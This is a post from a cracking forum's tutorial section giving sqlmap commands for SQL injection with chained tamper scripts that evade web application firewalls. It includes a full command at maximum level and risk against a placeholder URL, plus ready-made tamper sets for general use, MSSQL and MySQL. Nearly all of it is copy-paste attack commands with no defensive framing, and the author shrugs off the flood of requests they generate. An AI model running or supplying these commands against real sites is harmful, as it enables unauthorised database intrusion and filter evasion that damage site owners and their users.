ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
  1. Home
  2. Cracking
  3. Cracking Tutorials
  4. V.I.P ✨SQLMAP TAMPER SCRIPTS (SQL INJECTION AND WAF BYPASS) ✨
Patched.to
Cracking Tutorials

✨SQLMAP TAMPER SCRIPTS (SQL INJECTION AND WAF BYPASS) ✨

Submitted by INFINITY at 03-11-2021, 09:43 AM


V.I.P ✨SQLMAP TAMPER SCRIPTS (SQL INJECTION AND WAF BYPASS) ✨
5.339 Views
INFINITY's Avatar'
INFINITY
Away
INFINITY Away
130 Rep
🌟🌟🌟🌟🌟
Glory
Posts: 369
Threads: 175
Joined: Aug 2021
Vouches 0
Credits: 0
Junior Poster
New Poster
Moon
Radiant
Merry Christmas
Insane
Soul
Two-Factor Authentication
Mega Spam Fighter
Trusted
Spam Fighter
VIP
3 Years of Service
#1
OP  Posted at 03-11-2021, 09:43 AM
[ Hidden Content! ]
Hey All,
You all prob know about SQLmap’s ability to load tamper script rules to evade filters and WAF’s but what I didn’t know until a few months back was that you can use all of them in one line like so:

 
Code:

Code:
sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Quote:Quote:These are some targeted tamper sets by DBMS type, good to have handy when testing;
General Tamper testing:

 
Code:

Code:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

 
Code:

Code:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

 
Code:

Code:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Let’s just ignore the fact that you are sending a million requests though
Selling Signature. PM To Buy!
Find
4
Reply


Messages In This Thread
✨SQLMAP TAMPER SCRIPTS (SQL INJECTION AND WAF BYPASS) ✨ - by INFINITY - 03-11-2021, 09:43 AM


Users browsing this thread: 1 Guest(s)